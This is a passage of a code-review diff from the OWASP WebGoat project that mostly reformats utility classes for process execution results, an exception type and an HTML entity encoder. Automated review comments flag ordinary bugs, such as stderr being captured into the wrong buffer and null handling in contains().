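Review bot: In both `execOptions` overloads the stderr loop writes what it reads from `processError` into `output` (`output.write(c);` directly under `c = processError.read();`), so `errors` is never filled and `results.setErrors(errors.toString())` always records an empty string while stderr text is appended to the stdout result; the line should be `errors.write(c);`. That loop is also reached only after stdout hits EOF or `lazyQuit` is set, so a child that fills its stderr pipe before closing stdout can block the read until the watcher fires (or forever when `timeout` is 0); reading both streams concurrently or merging them with `ProcessBuilder.redirectErrorStream(true)` avoids that. `input.getBytes()` and `output.toString()` use the platform default charset, so the captured text depends on the container's locale; passing an explicit `Charset` removes that. The watcher started for `timeout > 0` is never signalled when the child exits normally, so it presumably keeps running until its own timeout elapses — worth confirming against `ThreadWatcher`, which is not in this hunk.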
@@ -1,360 +1,353 @@ + package org.owasp.webgoat.util; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author Jeff Williams Aspect Security */ public class ExecResults { - /** - * Description of the Field - */ - public final static int BADRETURNCODE = 2; + /** + * Description of the Field + */ + public final static int BADRETURNCODE = 2; - /** - * Description of the Field - */ - public final static int THROWABLE = 1; + /** + * Description of the Field + */ + public final static int THROWABLE = 1; - private String myCommand; + private String myCommand; - private boolean myError = false; + private boolean myError = false; - private int myErrorType = 0; + private int myErrorType = 0; - private String myErrors = null; + private String myErrors = null; - private String myInput; + private String myInput; - private boolean myInterrupted = false; + private boolean myInterrupted = false; - private String myOutput = null; + private String myOutput = null; - private int myReturnCode = 0; + private int myReturnCode = 0; - private int mySuccessCode; + private int mySuccessCode; - private Throwable myThrowable = null; + private Throwable myThrowable = null; - private int myTimeout; + private int myTimeout; - - /** - * Constructor for the ExecResults object - * - *@param command Description of the Parameter - *@param input Description of the Parameter - *@param successCode Description of the Parameter - *@param timeout Description of the Parameter - */ - public ExecResults(String command, String input, int successCode, - int timeout) - { - myCommand = command.trim(); - myInput = input.trim(); - mySuccessCode = successCode; - myTimeout = timeout; - } - - - /** - * Description of the Method - * - *@param haystack Description of the Parameter - *@param needle 
Description of the Parameter - *@param fromIndex Description of the Parameter - *@return Description of the Return Value - */ - private boolean contains(String haystack, String needle, int fromIndex) - { - return (haystack.trim().toLowerCase().indexOf( - needle.trim().toLowerCase(), fromIndex) != -1); - } - - - /** - * Description of the Method - * - *@param value Description of the Parameter - *@return Description of the Return Value - */ - public boolean errorsContains(String value) - { - return (errorsContains(value, 0)); - } - - - /** - * Description of the Method - * - *@param value Description of the Parameter - *@param fromIndex Description of the Parameter - *@return Description of the Return Value - */ - public boolean errorsContains(String value, int fromIndex) - { - return (contains(myErrors, value, fromIndex)); - } - - - /** - * Gets the error attribute of the ExecResults object - * - *@return The error value - */ - public boolean getError() - { - return (myError); - } - - - /** - * Gets the errorMessage attribute of the ExecResults object - * - *@return The errorMessage value - */ - public String getErrorMessage() - { - switch (getErrorType()) + /** + * Constructor for the ExecResults object + * + * @param command + * Description of the Parameter + * @param input + * Description of the Parameter + * @param successCode + * Description of the Parameter + * @param timeout + * Description of the Parameter + */ + public ExecResults(String command, String input, int successCode, int timeout) { - case THROWABLE: - return ("Exception: " + myThrowable.getMessage()); - - case BADRETURNCODE: - return ("Bad return code (expected " + mySuccessCode + ")"); - - default: - return ("Unknown error"); - } - } - - - /** - * Gets the errorType attribute of the ExecResults object - * - *@return The errorType value - */ - public int getErrorType() - { - return (myErrorType); - } - - - /** - * Gets the errors attribute of the ExecResults object - * - *@return The errors value 
- */ - public String getErrors() - { - return (myErrors); - } - - - /** - * Gets the interrupted attribute of the ExecResults object - * - *@return The interrupted value - */ - public boolean getInterrupted() - { - return (myInterrupted); - } - - - /** - * Gets the output attribute of the ExecResults object - * - *@return The output value - */ - public String getOutput() - { - return (myOutput); - } - - - /** - * Gets the returnCode attribute of the ExecResults object - * - *@return The returnCode value - */ - public int getReturnCode() - { - return (myReturnCode); - } - - - /** - * Gets the throwable attribute of the ExecResults object - * - *@return The throwable value - */ - public Throwable getThrowable() - { - return (myThrowable); - } - - - /** - * Description of the Method - * - *@param value Description of the Parameter - *@return Description of the Return Value - */ - public boolean outputContains(String value) - { - return (outputContains(value, 0)); - } - - - /** - * Description of the Method - * - *@param value Description of the Parameter - *@param fromIndex Description of the Parameter - *@return Description of the Return Value - */ - public boolean outputContains(String value, int fromIndex) - { - return (contains(myOutput, value, fromIndex)); - } - - - /** - * Sets the error attribute of the ExecResults object - * - *@param value The new error value - */ - public void setError(int value) - { - myError = true; - myErrorType = value; - } - - - /** - * Sets the errors attribute of the ExecResults object - * - *@param errors The new errors value - */ - public void setErrors(String errors) - { - myErrors = errors.trim(); - } - - - /** - * Sets the interrupted attribute of the ExecResults object - */ - public void setInterrupted() - { - myInterrupted = true; - } - - - /** - * Sets the output attribute of the ExecResults object - * - *@param value The new output value - */ - public void setOutput(String value) - { - myOutput = value.trim(); - } - - - /** - 
* Sets the returnCode attribute of the ExecResults object - * - *@param value The new returnCode value - */ - public void setReturnCode(int value) - { - myReturnCode = value; - } - - - /** - * Sets the throwable attribute of the ExecResults object - * - *@param value The new throwable value - */ - public void setThrowable(Throwable value) - { - setError(THROWABLE); - myThrowable = value; - } - - - /** - * Description of the Method - * - *@return Description of the Return Value - */ - public String toString() - { - String sep = System.getProperty("line.separator"); - StringBuffer value = new StringBuffer(); - value.append("ExecResults for \'" + myCommand + "\'" + sep); - - if ((myInput != null) && !myInput.equals("")) - { - value.append(sep + "Input..." + sep + myInput + sep); + myCommand = command.trim(); + myInput = input.trim(); + mySuccessCode = successCode; + myTimeout = timeout; } - if ((myOutput != null) && !myOutput.equals("")) + /** + * Description of the Method + * + * @param haystack + * Description of the Parameter + * @param needle + * Description of the Parameter + * @param fromIndex + * Description of the Parameter + * @return Description of the Return Value + */ + private boolean contains(String haystack, String needle, int fromIndex) { - value.append(sep + "Output..." + sep + myOutput + sep); + return (haystack.trim().toLowerCase().indexOf(needle.trim().toLowerCase(), fromIndex) != -1); } - if ((myErrors != null) && !myErrors.equals("")) + /** + * Description of the Method + * + * @param value + * Description of the Parameter + * @return Description of the Return Value + */ + public boolean errorsContains(String value) { - value.append(sep + "Errors..." 
+ sep + myErrors + sep); + return (errorsContains(value, 0)); } - value.append(sep); - - if (myInterrupted) + /** + * Description of the Method + * + * @param value + * Description of the Parameter + * @param fromIndex + * Description of the Parameter + * @return Description of the Return Value + */ + public boolean errorsContains(String value, int fromIndex) { - value.append("Command timed out after " + (myTimeout / 1000) - + " seconds " + sep); + return (contains(myErrors, value, fromIndex)); } - value.append("Returncode: " + myReturnCode + sep); - - if (myError) + /** + * Gets the error attribute of the ExecResults object + * + * @return The error value + */ + public boolean getError() { - value.append(getErrorMessage() + sep); + return (myError); } - return (value.toString()); - } + /** + * Gets the errorMessage attribute of the ExecResults object + * + * @return The errorMessage value + */ + public String getErrorMessage() + { + switch (getErrorType()) + { + case THROWABLE: + return ("Exception: " + myThrowable.getMessage()); + + case BADRETURNCODE: + return ("Bad return code (expected " + mySuccessCode + ")"); + + default: + return ("Unknown error"); + } + } + + /** + * Gets the errorType attribute of the ExecResults object + * + * @return The errorType value + */ + public int getErrorType() + { + return (myErrorType); + } + + /** + * Gets the errors attribute of the ExecResults object + * + * @return The errors value + */ + public String getErrors() + { + return (myErrors); + } + + /** + * Gets the interrupted attribute of the ExecResults object + * + * @return The interrupted value + */ + public boolean getInterrupted() + { + return (myInterrupted); + } + + /** + * Gets the output attribute of the ExecResults object + * + * @return The output value + */ + public String getOutput() + { + return (myOutput); + } + + /** + * Gets the returnCode attribute of the ExecResults object + * + * @return The returnCode value + */ + public int getReturnCode() + { + 
return (myReturnCode); + } + + /** + * Gets the throwable attribute of the ExecResults object + * + * @return The throwable value + */ + public Throwable getThrowable() + { + return (myThrowable); + } + + /** + * Description of the Method + * + * @param value + * Description of the Parameter + * @return Description of the Return Value + */ + public boolean outputContains(String value) + { + return (outputContains(value, 0)); + } + + /** + * Description of the Method + * + * @param value + * Description of the Parameter + * @param fromIndex + * Description of the Parameter + * @return Description of the Return Value + */ + public boolean outputContains(String value, int fromIndex) + { + return (contains(myOutput, value, fromIndex)); + } + + /** + * Sets the error attribute of the ExecResults object + * + * @param value + * The new error value + */ + public void setError(int value) + { + myError = true; + myErrorType = value; + } + + /** + * Sets the errors attribute of the ExecResults object + * + * @param errors + * The new errors value + */ + public void setErrors(String errors) + { + myErrors = errors.trim(); + } + + /** + * Sets the interrupted attribute of the ExecResults object + */ + public void setInterrupted() + { + myInterrupted = true; + } + + /** + * Sets the output attribute of the ExecResults object + * + * @param value + * The new output value + */ + public void setOutput(String value) + { + myOutput = value.trim(); + } + + /** + * Sets the returnCode attribute of the ExecResults object + * + * @param value + * The new returnCode value + */ + public void setReturnCode(int value) + { + myReturnCode = value; + } + + /** + * Sets the throwable attribute of the ExecResults object + * + * @param value + * The new throwable value + */ + public void setThrowable(Throwable value) + { + setError(THROWABLE); + myThrowable = value; + } + + /** + * Description of the Method + * + * @return Description of the Return Value + */ + public String toString() + { + 
String sep = System.getProperty("line.separator"); + StringBuffer value = new StringBuffer(); + value.append("ExecResults for \'" + myCommand + "\'" + sep); + + if ((myInput != null) && !myInput.equals("")) + { + value.append(sep + "Input..." + sep + myInput + sep); + } + + if ((myOutput != null) && !myOutput.equals("")) + { + value.append(sep + "Output..." + sep + myOutput + sep); + } + + if ((myErrors != null) && !myErrors.equals("")) + { + value.append(sep + "Errors..." + sep + myErrors + sep); + } + + value.append(sep); + + if (myInterrupted) + { + value.append("Command timed out after " + (myTimeout / 1000) + " seconds " + sep); + } + + value.append("Returncode: " + myReturnCode + sep); + + if (myError) + { + value.append(getErrorMessage() + sep); + } + + return (value.toString()); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java b/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java index bf2cfcee5..358bfc8b2 100644 --- a/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java +++ b/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java 
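Review bot: `contains()` calls `haystack.trim()` unconditionally, yet `myOutput` and `myErrors` are initialised to `null` and only populated through `setOutput`/`setErrors`, so `outputContains`/`errorsContains` throw NullPointerException on any result whose stdout or stderr was never captured (e.g. a command that failed before producing output) instead of returning false. A null guard as the first line of `contains` keeps the method a plain predicate: `if (haystack == null || needle == null) return false;`. The constructor's `input.trim()` and the `setOutput`/`setErrors` setters have the same exposure if `Exec` ever passes null, which cannot be confirmed from this hunk. Note also that `toString()` echoes the full command line plus raw stdout/stderr, so anything rendering it into a page or log should treat that text as untrusted process output, not as a safe diagnostic string.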
@@ -1,61 +1,59 @@ + package org.owasp.webgoat.util; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author Jeff Williams Aspect Security */ public class ExecutionException extends Exception { - /** + /** * */ private static final long serialVersionUID = 7282947463831152092L; + /** + * Constructor for the ExecutionException object + */ + public ExecutionException() + { + super(); + } /** - * Constructor for the ExecutionException object - */ - public ExecutionException() - { - super(); - } - - - /** - * Constructor for the ExecutionException object - * - *@param msg Description of the Parameter - */ - public ExecutionException(String msg) - { - super(msg); - } + * Constructor for the ExecutionException object + * + * @param msg + * Description of the Parameter + */ + public ExecutionException(String msg) + { + super(msg); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java b/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java index 2c613c890..f6fed5351 100644 --- a/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java +++ b/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java 
@@ -1,225 +1,225 @@ + package org.owasp.webgoat.util; import java.util.HashMap; import java.util.Map; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class HtmlEncoder { - static Map e2i = new HashMap(); + static Map e2i = new HashMap(); - static Map i2e = new HashMap(); + static Map i2e = new HashMap(); - // html entity list - private static Object[][] entities = { { "quot", new Integer(34) }, // " - double-quote - { "amp", new Integer(38) }, // & - ampersand - { "lt", new Integer(60) }, // < - less-than - { "gt", new Integer(62) }, // > - greater-than - { "nbsp", new Integer(160) }, // non-breaking space - { "copy", new Integer(169) }, // © - copyright - { "reg", new Integer(174) }, // ® - registered trademark - { "Agrave", new Integer(192) }, // À - uppercase A, grave accent - { "Aacute", new Integer(193) }, // Á - uppercase A, acute accent - { "Acirc", new Integer(194) }, // Â - uppercase A, circumflex accent - { "Atilde", new Integer(195) }, // Ã - uppercase A, tilde - { "Auml", new Integer(196) }, // Ä - uppercase A, umlaut - { "Aring", new Integer(197) }, // Å - uppercase A, ring - { "AElig", new Integer(198) }, // Æ - uppercase AE - { "Ccedil", new Integer(199) }, // Ç - uppercase C, cedilla - { "Egrave", new Integer(200) }, // È - uppercase E, grave accent - { "Eacute", new Integer(201) }, // É - uppercase E, acute accent - { "Ecirc", new Integer(202) }, // Ê - uppercase E, circumflex accent - { "Euml", new Integer(203) }, // Ë - uppercase E, umlaut - { "Igrave", new Integer(204) }, // Ì - uppercase I, grave accent - { "Iacute", new Integer(205) }, // Í - uppercase I, 
acute accent - { "Icirc", new Integer(206) }, // Î - uppercase I, circumflex accent - { "Iuml", new Integer(207) }, // Ï - uppercase I, umlaut - { "ETH", new Integer(208) }, // Ð - uppercase Eth, Icelandic - { "Ntilde", new Integer(209) }, // Ñ - uppercase N, tilde - { "Ograve", new Integer(210) }, // Ò - uppercase O, grave accent - { "Oacute", new Integer(211) }, // Ó - uppercase O, acute accent - { "Ocirc", new Integer(212) }, // Ô - uppercase O, circumflex accent - { "Otilde", new Integer(213) }, // Õ - uppercase O, tilde - { "Ouml", new Integer(214) }, // Ö - uppercase O, umlaut - { "Oslash", new Integer(216) }, // Ø - uppercase O, slash - { "Ugrave", new Integer(217) }, // Ù - uppercase U, grave accent - { "Uacute", new Integer(218) }, // Ú - uppercase U, acute accent - { "Ucirc", new Integer(219) }, // Û - uppercase U, circumflex accent - { "Uuml", new Integer(220) }, // Ü - uppercase U, umlaut - { "Yacute", new Integer(221) }, // Ý - uppercase Y, acute accent - { "THORN", new Integer(222) }, // Þ - uppercase THORN, Icelandic - { "szlig", new Integer(223) }, // ß - lowercase sharps, German - { "agrave", new Integer(224) }, // à - lowercase a, grave accent - { "aacute", new Integer(225) }, // á - lowercase a, acute accent - { "acirc", new Integer(226) }, // â - lowercase a, circumflex accent - { "atilde", new Integer(227) }, // ã - lowercase a, tilde - { "auml", new Integer(228) }, // ä - lowercase a, umlaut - { "aring", new Integer(229) }, // å - lowercase a, ring - { "aelig", new Integer(230) }, // æ - lowercase ae - { "ccedil", new Integer(231) }, // ç - lowercase c, cedilla - { "egrave", new Integer(232) }, // è - lowercase e, grave accent - { "eacute", new Integer(233) }, // é - lowercase e, acute accent - { "ecirc", new Integer(234) }, // ê - lowercase e, circumflex accent - { "euml", new Integer(235) }, // ë - lowercase e, umlaut - { "igrave", new Integer(236) }, // ì - lowercase i, grave accent - { "iacute", new Integer(237) }, // í - lowercase i, 
acute accent - { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent - { "iuml", new Integer(239) }, // ï - lowercase i, umlaut - { "igrave", new Integer(236) }, // ì - lowercase i, grave accent - { "iacute", new Integer(237) }, // í - lowercase i, acute accent - { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent - { "iuml", new Integer(239) }, // ï - lowercase i, umlaut - { "eth", new Integer(240) }, // ð - lowercase eth, Icelandic - { "ntilde", new Integer(241) }, // ñ - lowercase n, tilde - { "ograve", new Integer(242) }, // ò - lowercase o, grave accent - { "oacute", new Integer(243) }, // ó - lowercase o, acute accent - { "ocirc", new Integer(244) }, // ô - lowercase o, circumflex accent - { "otilde", new Integer(245) }, // õ - lowercase o, tilde - { "ouml", new Integer(246) }, // ö - lowercase o, umlaut - { "oslash", new Integer(248) }, // ø - lowercase o, slash - { "ugrave", new Integer(249) }, // ù - lowercase u, grave accent - { "uacute", new Integer(250) }, // ú - lowercase u, acute accent - { "ucirc", new Integer(251) }, // û - lowercase u, circumflex accent - { "uuml", new Integer(252) }, // ü - lowercase u, umlaut - { "yacute", new Integer(253) }, // ý - lowercase y, acute accent - { "thorn", new Integer(254) }, // þ - lowercase thorn, Icelandic - { "yuml", new Integer(255) }, // ÿ - lowercase y, umlaut - { "euro", new Integer(8364) },// Euro symbol - }; + // html entity list + private static Object[][] entities = { { "quot", new Integer(34) }, // " - double-quote + { "amp", new Integer(38) }, // & - ampersand + { "lt", new Integer(60) }, // < - less-than + { "gt", new Integer(62) }, // > - greater-than + { "nbsp", new Integer(160) }, // non-breaking space + { "copy", new Integer(169) }, // © - copyright + { "reg", new Integer(174) }, // ® - registered trademark + { "Agrave", new Integer(192) }, // À - uppercase A, grave accent + { "Aacute", new Integer(193) }, // Á - uppercase A, acute accent + { "Acirc", new 
Integer(194) }, // Â - uppercase A, circumflex accent + { "Atilde", new Integer(195) }, // Ã - uppercase A, tilde + { "Auml", new Integer(196) }, // Ä - uppercase A, umlaut + { "Aring", new Integer(197) }, // Å - uppercase A, ring + { "AElig", new Integer(198) }, // Æ - uppercase AE + { "Ccedil", new Integer(199) }, // Ç - uppercase C, cedilla + { "Egrave", new Integer(200) }, // È - uppercase E, grave accent + { "Eacute", new Integer(201) }, // É - uppercase E, acute accent + { "Ecirc", new Integer(202) }, // Ê - uppercase E, circumflex accent + { "Euml", new Integer(203) }, // Ë - uppercase E, umlaut + { "Igrave", new Integer(204) }, // Ì - uppercase I, grave accent + { "Iacute", new Integer(205) }, // Í - uppercase I, acute accent + { "Icirc", new Integer(206) }, // Î - uppercase I, circumflex accent + { "Iuml", new Integer(207) }, // Ï - uppercase I, umlaut + { "ETH", new Integer(208) }, // Ð - uppercase Eth, Icelandic + { "Ntilde", new Integer(209) }, // Ñ - uppercase N, tilde + { "Ograve", new Integer(210) }, // Ò - uppercase O, grave accent + { "Oacute", new Integer(211) }, // Ó - uppercase O, acute accent + { "Ocirc", new Integer(212) }, // Ô - uppercase O, circumflex accent + { "Otilde", new Integer(213) }, // Õ - uppercase O, tilde + { "Ouml", new Integer(214) }, // Ö - uppercase O, umlaut + { "Oslash", new Integer(216) }, // Ø - uppercase O, slash + { "Ugrave", new Integer(217) }, // Ù - uppercase U, grave accent + { "Uacute", new Integer(218) }, // Ú - uppercase U, acute accent + { "Ucirc", new Integer(219) }, // Û - uppercase U, circumflex accent + { "Uuml", new Integer(220) }, // Ü - uppercase U, umlaut + { "Yacute", new Integer(221) }, // Ý - uppercase Y, acute accent + { "THORN", new Integer(222) }, // Þ - uppercase THORN, Icelandic + { "szlig", new Integer(223) }, // ß - lowercase sharps, German + { "agrave", new Integer(224) }, // à - lowercase a, grave accent + { "aacute", new Integer(225) }, // á - lowercase a, acute accent + { "acirc", new 
Integer(226) }, // â - lowercase a, circumflex accent + { "atilde", new Integer(227) }, // ã - lowercase a, tilde + { "auml", new Integer(228) }, // ä - lowercase a, umlaut + { "aring", new Integer(229) }, // å - lowercase a, ring + { "aelig", new Integer(230) }, // æ - lowercase ae + { "ccedil", new Integer(231) }, // ç - lowercase c, cedilla + { "egrave", new Integer(232) }, // è - lowercase e, grave accent + { "eacute", new Integer(233) }, // é - lowercase e, acute accent + { "ecirc", new Integer(234) }, // ê - lowercase e, circumflex accent + { "euml", new Integer(235) }, // ë - lowercase e, umlaut + { "igrave", new Integer(236) }, // ì - lowercase i, grave accent + { "iacute", new Integer(237) }, // í - lowercase i, acute accent + { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent + { "iuml", new Integer(239) }, // ï - lowercase i, umlaut + { "igrave", new Integer(236) }, // ì - lowercase i, grave accent + { "iacute", new Integer(237) }, // í - lowercase i, acute accent + { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent + { "iuml", new Integer(239) }, // ï - lowercase i, umlaut + { "eth", new Integer(240) }, // ð - lowercase eth, Icelandic + { "ntilde", new Integer(241) }, // ñ - lowercase n, tilde + { "ograve", new Integer(242) }, // ò - lowercase o, grave accent + { "oacute", new Integer(243) }, // ó - lowercase o, acute accent + { "ocirc", new Integer(244) }, // ô - lowercase o, circumflex accent + { "otilde", new Integer(245) }, // õ - lowercase o, tilde + { "ouml", new Integer(246) }, // ö - lowercase o, umlaut + { "oslash", new Integer(248) }, // ø - lowercase o, slash + { "ugrave", new Integer(249) }, // ù - lowercase u, grave accent + { "uacute", new Integer(250) }, // ú - lowercase u, acute accent + { "ucirc", new Integer(251) }, // û - lowercase u, circumflex accent + { "uuml", new Integer(252) }, // ü - lowercase u, umlaut + { "yacute", new Integer(253) }, // ý - lowercase y, acute accent + { "thorn", new 
Integer(254) }, // þ - lowercase thorn, Icelandic + { "yuml", new Integer(255) }, // ÿ - lowercase y, umlaut + { "euro", new Integer(8364) },// Euro symbol + }; - - public HtmlEncoder() - { - for (int i = 0; i < entities.length; i++) - e2i.put((String)entities[i][0], (Integer)entities[i][1]); - for (int i = 0; i < entities.length; i++) - i2e.put((Integer)entities[i][1], (String)entities[i][0]); - } - - - /** - * Turns funky characters into HTML entity equivalents

- * - * e.g. "bread" & "butter" => &quot;bread&quot; &amp; - * &quot;butter&quot; . Update: supports nearly all HTML entities, including funky - * accents. See the source code for more detail. Adapted from - * http://www.purpletech.com/code/src/com/purpletech/util/Utils.java. - * - * @param s1 Description of the Parameter - * @return Description of the Return Value - */ - public static String encode(String s1) - { - StringBuffer buf = new StringBuffer(); - - int i; - for (i = 0; i < s1.length(); ++i) + public HtmlEncoder() { - char ch = s1.charAt(i); - - String entity = i2e.get(new Integer((int) ch)); - - if (entity == null) - { - if (((int) ch) > 128) - { - buf.append("&#" + ((int) ch) + ";"); - } - else - { - buf.append(ch); - } - } - else - { - buf.append("&" + entity + ";"); - } + for (int i = 0; i < entities.length; i++) + e2i.put((String) entities[i][0], (Integer) entities[i][1]); + for (int i = 0; i < entities.length; i++) + i2e.put((Integer) entities[i][1], (String) entities[i][0]); } - return buf.toString(); - } - - - /** - * Given a string containing entity escapes, returns a string containing the actual Unicode - * characters corresponding to the escapes. Adapted from - * http://www.purpletech.com/code/src/com/purpletech/util/Utils.java. - * - * @param s1 Description of the Parameter - * @return Description of the Return Value - */ - public static String decode(String s1) - { - StringBuffer buf = new StringBuffer(); - - int i; - for (i = 0; i < s1.length(); ++i) + /** + * Turns funky characters into HTML entity equivalents + *

+ * + * e.g. "bread" & "butter" => &quot;bread&quot; &amp; + * &quot;butter&quot; . + * Update: supports nearly all HTML entities, including funky accents. See the source code for + * more detail. Adapted from http://www.purpletech.com/code/src/com/purpletech/util/Utils.java. + * + * @param s1 + * Description of the Parameter + * @return Description of the Return Value + */ + public static String encode(String s1) { - char ch = s1.charAt(i); + StringBuffer buf = new StringBuffer(); - if (ch == '&') - { - int semi = s1.indexOf(';', i + 1); - if (semi == -1) + int i; + for (i = 0; i < s1.length(); ++i) { - buf.append(ch); - continue; + char ch = s1.charAt(i); + + String entity = i2e.get(new Integer((int) ch)); + + if (entity == null) + { + if (((int) ch) > 128) + { + buf.append("&#" + ((int) ch) + ";"); + } + else + { + buf.append(ch); + } + } + else + { + buf.append("&" + entity + ";"); + } } - String entity = s1.substring(i + 1, semi); - Integer iso; - if (entity.charAt(0) == '#') - { - iso = new Integer(entity.substring(1)); - } - else - { - iso = e2i.get(entity); - } - if (iso == null) - { - buf.append("&" + entity + ";"); - } - else - { - buf.append((char) (iso.intValue())); - } - i = semi; - } - else - { - buf.append(ch); - } + + return buf.toString(); } - return buf.toString(); - } + /** + * Given a string containing entity escapes, returns a string containing the actual Unicode + * characters corresponding to the escapes. Adapted from + * http://www.purpletech.com/code/src/com/purpletech/util/Utils.java. 
+ * + * @param s1 + * Description of the Parameter + * @return Description of the Return Value + */ + public static String decode(String s1) + { + StringBuffer buf = new StringBuffer(); + + int i; + for (i = 0; i < s1.length(); ++i) + { + char ch = s1.charAt(i); + + if (ch == '&') + { + int semi = s1.indexOf(';', i + 1); + if (semi == -1) + { + buf.append(ch); + continue; + } + String entity = s1.substring(i + 1, semi); + Integer iso; + if (entity.charAt(0) == '#') + { + iso = new Integer(entity.substring(1)); + } + else + { + iso = e2i.get(entity); + } + if (iso == null) + { + buf.append("&" + entity + ";"); + } + else + { + buf.append((char) (iso.intValue())); + } + i = semi; + } + else + { + buf.append(ch); + } + } + + return buf.toString(); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java b/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java index 9ddd00a37..a72d4ab4a 100644 --- a/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java +++ b/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java @@ -1,6 +1,7 @@ /** * */ + package org.owasp.webgoat.util; import java.io.IOException; @@ -8,9 +9,7 @@ import java.io.BufferedReader; import java.io.PrintWriter; import java.io.InputStreamReader; import java.net.UnknownHostException; - import java.net.Socket; - import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; 
